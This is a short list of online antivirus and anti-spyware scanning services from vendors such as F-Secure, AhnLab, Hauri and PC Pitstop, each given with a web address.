F-Secure Online Scanner 
http://support.f-secure.com/enu/home/ols.shtml
Windows Live OneCare Safety Scanner 
http://onecare.live.com/site/en-us/default.htm
AhnLab MyV3 Online Anti-Virus Scanner 
http://global.ahnlab.com/global/products/myv3.html
Ahnlab MyV3 Real-Time Scan 
http://global.ahnlab.com/global/products/myv3_rts.html
Ahnlab MySpyZero 
http://global.ahnlab.com/global/products/myspyzero.html
Athentium Command on Demand 
http://www.commandondemand.com/eval/cod/codie.htm  

Hauri LiveCall 
http://www2.globalhauri.com/html/onlineservice/livecall_service.html
PC Pitstop Virus Scanner
http://www.pcpitstop.com/antivirus/AVLoad.asp
Avert Labs WebImmune (registration with scan results in email) 
http://analyzer.surfright.nl/analyzer/ 

Twitter Delicious Facebook Digg Stumbleupon Favorites More